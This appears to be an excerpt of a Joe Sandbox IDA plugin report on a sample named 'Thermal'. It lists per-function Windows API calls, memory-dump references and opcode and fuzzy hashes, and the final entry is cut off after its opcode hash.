                                                      • Opcode Fuzzy Hash: 3bea7a1c9495c364d8b4800a4394bd569f9c437ad4dfb187295095bcad492ba5
                                                      • Instruction Fuzzy Hash: B2311430908B56DBFB30CBA4BCC4BAA77E9AB01344F11105AF5228A5D1D7B1A899E711
                                                      APIs
                                                      • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00121275,SwapMouseButtons,00000004,?), ref: 001212A8
                                                      • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00121275,SwapMouseButtons,00000004,?), ref: 001212C9
                                                      • RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,00121275,SwapMouseButtons,00000004,?), ref: 001212EB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: CloseOpenQueryValue
                                                      • String ID: Control Panel\Mouse
                                                      • API String ID: 3677997916-824357125
                                                      • Opcode ID: 387f0e37609ea00a9ec064b688877a97c0c4dc4008dd5617fff0e840eef93896
                                                      • Instruction ID: c4f57ba21313695ad6dab204e63d9ab4553a9d4afc63dd1d9cf460048740a2dc
                                                      • Opcode Fuzzy Hash: 387f0e37609ea00a9ec064b688877a97c0c4dc4008dd5617fff0e840eef93896
                                                      • Instruction Fuzzy Hash: 41114571614228FFDB21CFA5EC84AAFBBA8EF14750F104569F805D7210E331AE509BA0
                                                      APIs
                                                      • GetFileAttributesW.KERNEL32(?,001B2C4C), ref: 00183F57
                                                      • GetLastError.KERNEL32 ref: 00183F66
                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 00183F75
                                                      • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,001B2C4C), ref: 00183FD2
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: CreateDirectory$AttributesErrorFileLast
                                                      • String ID:
                                                      • API String ID: 2267087916-0
                                                      • Opcode ID: 5ff2f9448f79861430eb55f452221ea04a85b469dad01c0eaa95ec4b2dc41d75
                                                      • Instruction ID: fac43bbaf491d11481efd9fe259f6ef816940c2abf762aa8a12f8b0bf326ce01
                                                      • Opcode Fuzzy Hash: 5ff2f9448f79861430eb55f452221ea04a85b469dad01c0eaa95ec4b2dc41d75
                                                      • Instruction Fuzzy Hash: 62217E709082019FC604EF28C8858AAB7F4BF59764F144A19F5A5C72A2DB30DA4ACF93
                                                      APIs
                                                      • _memset.LIBCMT ref: 00135B58
                                                        • Part of subcall function 001356F8: _memset.LIBCMT ref: 00135787
                                                        • Part of subcall function 001356F8: _wcscpy.LIBCMT ref: 001357DB
                                                        • Part of subcall function 001356F8: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 001357EB
                                                      • KillTimer.USER32(?,00000001,?,?), ref: 00135BAD
                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00135BBC
                                                      • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00170D7C
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                      • String ID:
                                                      • API String ID: 1378193009-0
                                                      • Opcode ID: f4187bf617821b8fa5e71524db5a28967b3f19b013d8d231f5d5dff593eb0346
                                                      • Instruction ID: b6b042a17ef5072268750f2f8dfe427c4bda34622d081f62578a997f95c2c07e
                                                      • Opcode Fuzzy Hash: f4187bf617821b8fa5e71524db5a28967b3f19b013d8d231f5d5dff593eb0346
                                                      • Instruction Fuzzy Hash: 2121C5705047849FEB738B64C895BEBFBEDAF09708F04448DE69E56181C7752984CB51
                                                      APIs
                                                        • Part of subcall function 001349C2: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,001327AF,?,00000001), ref: 001349F4
                                                      • _free.LIBCMT ref: 0016FB04
                                                      • _free.LIBCMT ref: 0016FB4B
                                                        • Part of subcall function 001329BE: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00132ADF
                                                      Strings
                                                      • Bad directive syntax error, xrefs: 0016FB33
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: _free$CurrentDirectoryLibraryLoad
                                                      • String ID: Bad directive syntax error
                                                      • API String ID: 2861923089-2118420937
                                                      • Opcode ID: b3b6ad4c44d02ab817c65c0553f853e00581fb41318785a9d930da62f4629fbd
                                                      • Instruction ID: 3d05b0fdb9baca6e2e0881f7d29b05c3da1701f4296bef1db9448f0fb7151c1e
                                                      • Opcode Fuzzy Hash: b3b6ad4c44d02ab817c65c0553f853e00581fb41318785a9d930da62f4629fbd
                                                      • Instruction Fuzzy Hash: DB916F71910219AFCF08EFA4DC919EEB7B4FF19314F14456EF816AB2A1DB30AA15CB50
                                                      APIs
                                                        • Part of subcall function 00134AB2: __fread_nolock.LIBCMT ref: 00134AD0
                                                      • _wcscmp.LIBCMT ref: 00189DE1
                                                      • _wcscmp.LIBCMT ref: 00189DF4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: _wcscmp$__fread_nolock
                                                      • String ID: FILE
                                                      • API String ID: 4029003684-3121273764
                                                      • Opcode ID: 42b11e085f5af563a1c2849f3b123967b607cb40c0ba534a0d16e372716d2ad7
                                                      • Instruction ID: 2514e6e12de264d65b533f5dd384ea0c501026b7a8d8aece29a795bd29f2a553
                                                      • Opcode Fuzzy Hash: 42b11e085f5af563a1c2849f3b123967b607cb40c0ba534a0d16e372716d2ad7
                                                      • Instruction Fuzzy Hash: C2410971A40209BBDF21EAA4CC45FEF7BFDEF55710F00046AF901A7291D771AA048BA4
                                                      APIs
                                                      • _memset.LIBCMT ref: 0017032B
                                                      • GetOpenFileNameW.COMDLG32(?), ref: 00170375
                                                        • Part of subcall function 00140284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00132A58,?,00008000), ref: 001402A4
                                                        • Part of subcall function 001409C5: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 001409E4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Name$Path$FileFullLongOpen_memset
                                                      • String ID: X
                                                      • API String ID: 3777226403-3081909835
                                                      • Opcode ID: 1b92728ea4224283657a82aa4ceb9b37700c0a5fa9debcc48f6f5480acd74f18
                                                      • Instruction ID: 5f22a179b0dec17a2d58a5467e99b1ef9d41a369c3634c62f46e9a1b1d2a1626
                                                      • Opcode Fuzzy Hash: 1b92728ea4224283657a82aa4ceb9b37700c0a5fa9debcc48f6f5480acd74f18
                                                      • Instruction Fuzzy Hash: 7A219371A042989BDF41DF98C845BEE7BFCAF59304F00405AF518A7281DBB55A89CFA1
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4a7c298362cf8cba9f1260c6a36303e82d51348df0cddc562ba711484ce536e8
                                                      • Instruction ID: 32896f4558361ce25d795d76039f791f96f1656996b56ad526d6a11f5c7e4ddd
                                                      • Opcode Fuzzy Hash: 4a7c298362cf8cba9f1260c6a36303e82d51348df0cddc562ba711484ce536e8
                                                      • Instruction Fuzzy Hash: A3F14971A083019FCB14DF28D484A6ABBE5FF98314F55892EF8999B351D730E945CF82
                                                      APIs
                                                        • Part of subcall function 001407BB: MapVirtualKeyW.USER32(0000005B,00000000), ref: 001407EC
                                                        • Part of subcall function 001407BB: MapVirtualKeyW.USER32(00000010,00000000), ref: 001407F4
                                                        • Part of subcall function 001407BB: MapVirtualKeyW.USER32(000000A0,00000000), ref: 001407FF
                                                        • Part of subcall function 001407BB: MapVirtualKeyW.USER32(000000A1,00000000), ref: 0014080A
                                                        • Part of subcall function 001407BB: MapVirtualKeyW.USER32(00000011,00000000), ref: 00140812
                                                        • Part of subcall function 001407BB: MapVirtualKeyW.USER32(00000012,00000000), ref: 0014081A
                                                        • Part of subcall function 0013FF4C: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0012AC6B), ref: 0013FFA7
                                                      • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0012AD08
                                                      • OleInitialize.OLE32(00000000), ref: 0012AD85
                                                      • CloseHandle.KERNEL32(00000000), ref: 00162F56
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                      • String ID:
                                                      • API String ID: 1986988660-0
                                                      • Opcode ID: a14f31fd60a02603fc1ec95b2ce8b4c571854a2d444bb087ee65ba0dc4061322
                                                      • Instruction ID: e0a541ad6ecc00acd8f85b60c34726b92562e5e790d9f0b8686fb4b27c7ea958
                                                      • Opcode Fuzzy Hash: a14f31fd60a02603fc1ec95b2ce8b4c571854a2d444bb087ee65ba0dc4061322
                                                      • Instruction Fuzzy Hash: E281ABB09086C48EE38AEFAABEC465D7FE5FB58304710856AE419DBAF1E7304485CF51
                                                      APIs
                                                      • _memset.LIBCMT ref: 001359F9
                                                      • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00135A9E
                                                      • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00135ABB
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: IconNotifyShell_$_memset
                                                      • String ID:
                                                      • API String ID: 1505330794-0
                                                      • Opcode ID: 803312d0ae40d123fdb320495a29cb4999d838cb2331436b13f76202dd3e7224
                                                      • Instruction ID: 6698d7bb1dc6965e31abe558acb5e16f32795a44170f5ea3a9e5531a5dcb951d
                                                      • Opcode Fuzzy Hash: 803312d0ae40d123fdb320495a29cb4999d838cb2331436b13f76202dd3e7224
                                                      • Instruction Fuzzy Hash: 743182B0505B018FD725DF74D8C569BBBF8FB58704F000A2EF69A87290E771A984DB52
                                                      APIs
                                                      • __FF_MSGBANNER.LIBCMT ref: 00145953
                                                        • Part of subcall function 0014A39B: __NMSG_WRITE.LIBCMT ref: 0014A3C2
                                                        • Part of subcall function 0014A39B: __NMSG_WRITE.LIBCMT ref: 0014A3CC
                                                      • __NMSG_WRITE.LIBCMT ref: 0014595A
                                                        • Part of subcall function 0014A3F8: GetModuleFileNameW.KERNEL32(00000000,001E53BA,00000104,00000004,00000001,00141003), ref: 0014A48A
                                                        • Part of subcall function 0014A3F8: ___crtMessageBoxW.LIBCMT ref: 0014A538
                                                        • Part of subcall function 001432CF: ___crtCorExitProcess.LIBCMT ref: 001432D5
                                                        • Part of subcall function 001432CF: ExitProcess.KERNEL32 ref: 001432DE
                                                        • Part of subcall function 00148D58: __getptd_noexit.LIBCMT ref: 00148D58
                                                      • RtlAllocateHeap.NTDLL(010D0000,00000000,00000001,?,00000004,?,?,00141003,?), ref: 0014597F
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                      • String ID:
                                                      • API String ID: 1372826849-0
                                                      • Opcode ID: bca4931a23b63b58b12e5961c3db336bf954116403c9802ce3357d28622ceaeb
                                                      • Instruction ID: e0246379eba19fb90469eb83b47f32fcbfbad3db0df5052d943b4252c63f303e
                                                      • Opcode Fuzzy Hash: bca4931a23b63b58b12e5961c3db336bf954116403c9802ce3357d28622ceaeb
                                                      • Instruction Fuzzy Hash: E301F131342B42EBE7153BA4DC42A2E334AAF62778F510536F525AE1F2DF708D414761
                                                      APIs
                                                      • _free.LIBCMT ref: 001892D6
                                                        • Part of subcall function 00142F85: RtlFreeHeap.NTDLL(00000000,00000000,?,00149C54,00000000,00148D5D,001459C3), ref: 00142F99
                                                        • Part of subcall function 00142F85: GetLastError.KERNEL32(00000000,?,00149C54,00000000,00148D5D,001459C3), ref: 00142FAB
                                                      • _free.LIBCMT ref: 001892E7
                                                      • _free.LIBCMT ref: 001892F9
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: d545b8d0ab5e92762063c3ba8b14d4eaebd98453bfde93cefd35328ad8659e4d
                                                      • Instruction ID: 3ef410a947688bed710ca2984bc55ad94f4dfc8e6f6eed162b90e30975ad7283
                                                      • Opcode Fuzzy Hash: d545b8d0ab5e92762063c3ba8b14d4eaebd98453bfde93cefd35328ad8659e4d
                                                      • Instruction Fuzzy Hash: 65E0C2A120462253CA20B5386C40EA377EC0F88391798050DF409D3142CF70F8808628
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: CALL
                                                      • API String ID: 0-4196123274
                                                      • Opcode ID: 415bc1ceb0a39b447ffd2e7e01daedce88e26ac405aa0f32da1ec9c1497a6048
                                                      • Instruction ID: 4c7608d56422963c86d821b8743ad0d0fc88740bfba4fd2abcf6d4c5be0504e1
                                                      • Opcode Fuzzy Hash: 415bc1ceb0a39b447ffd2e7e01daedce88e26ac405aa0f32da1ec9c1497a6048
                                                      • Instruction Fuzzy Hash: 1B326A70508351DFCB28DF14D490A2AB7E1BF94304F15896DF89A9B3A2D731EDA5CB82
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: _memmove
                                                      • String ID: EA06
                                                      • API String ID: 4104443479-3962188686
                                                      • Opcode ID: 6b393f4b6032de5e33068d7c6f6c7bec10c56a3dae60fc4a8bcf97700ea7af04
                                                      • Instruction ID: 1445bc240ccc83987fa9e2caa3663a42b1d7c7c3e55cf60295ebe8d740a8ed43
                                                      • Opcode Fuzzy Hash: 6b393f4b6032de5e33068d7c6f6c7bec10c56a3dae60fc4a8bcf97700ea7af04
                                                      • Instruction Fuzzy Hash: 9041B021E042589BDF269B548C517BF7FB19B5D324F294075F886E7286C720AD84C3E2
                                                      APIs
                                                      • _strcat.LIBCMT ref: 0019E20C
                                                        • Part of subcall function 00124D37: __itow.LIBCMT ref: 00124D62
                                                        • Part of subcall function 00124D37: __swprintf.LIBCMT ref: 00124DAC
                                                      • _wcscpy.LIBCMT ref: 0019E29B
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: __itow__swprintf_strcat_wcscpy
                                                      • String ID:
                                                      • API String ID: 1012013722-0
                                                      • Opcode ID: c4242f8c0116a65a187b4a15c73e390c3b296cbdcc7a8c5ba3417b4ac82b31b6
                                                      • Instruction ID: bb4796595e51d8022c6fe24092480439fde402763bdcf9106f99a5042148a1ca
                                                      • Opcode Fuzzy Hash: c4242f8c0116a65a187b4a15c73e390c3b296cbdcc7a8c5ba3417b4ac82b31b6
                                                      • Instruction Fuzzy Hash: 49911735A00614DFCB18DF28D5819ADBBE5FF59310B95805AF81A8F366EB30EE51CB81
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: CloseCreateHandleProcess
                                                      • String ID:
                                                      • API String ID: 3712363035-0
                                                      • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                      • Instruction ID: aff9baa43f35d3d7b9f333017e6d9b09ba6e5267e6993e042b880f6c392b9c72
                                                      • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                      • Instruction Fuzzy Hash: DE31E671A00109DFC71ADF5AC480969F7A6FF89310B658AA5E509EF262E731EDD1CBC0
                                                      APIs
                                                      • IsThemeActive.UXTHEME ref: 00135FEF
                                                        • Part of subcall function 0014359C: __lock.LIBCMT ref: 001435A2
                                                        • Part of subcall function 0014359C: DecodePointer.KERNEL32(00000001,?,00136004,00178892), ref: 001435AE
                                                        • Part of subcall function 0014359C: EncodePointer.KERNEL32(?,?,00136004,00178892), ref: 001435B9
                                                        • Part of subcall function 00135F00: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00135F18
                                                        • Part of subcall function 00135F00: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00135F2D
                                                        • Part of subcall function 00135240: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0013526C
                                                        • Part of subcall function 00135240: IsDebuggerPresent.KERNEL32 ref: 0013527E
                                                        • Part of subcall function 00135240: GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 001352E6
                                                        • Part of subcall function 00135240: SetCurrentDirectoryW.KERNEL32(?), ref: 00135366
                                                      • SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 0013602F
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                      • String ID:
                                                      • API String ID: 1438897964-0
                                                      • Opcode ID: ed72f5232d3b3f3bcc16975463d056df4b477888f0ca69847ffb8fe0d95731f4
                                                      • Instruction ID: 57912bd3a46b5751b09d4e1da001032fac7777e40bf7408d93c3965ef7c345fd
                                                      • Opcode Fuzzy Hash: ed72f5232d3b3f3bcc16975463d056df4b477888f0ca69847ffb8fe0d95731f4
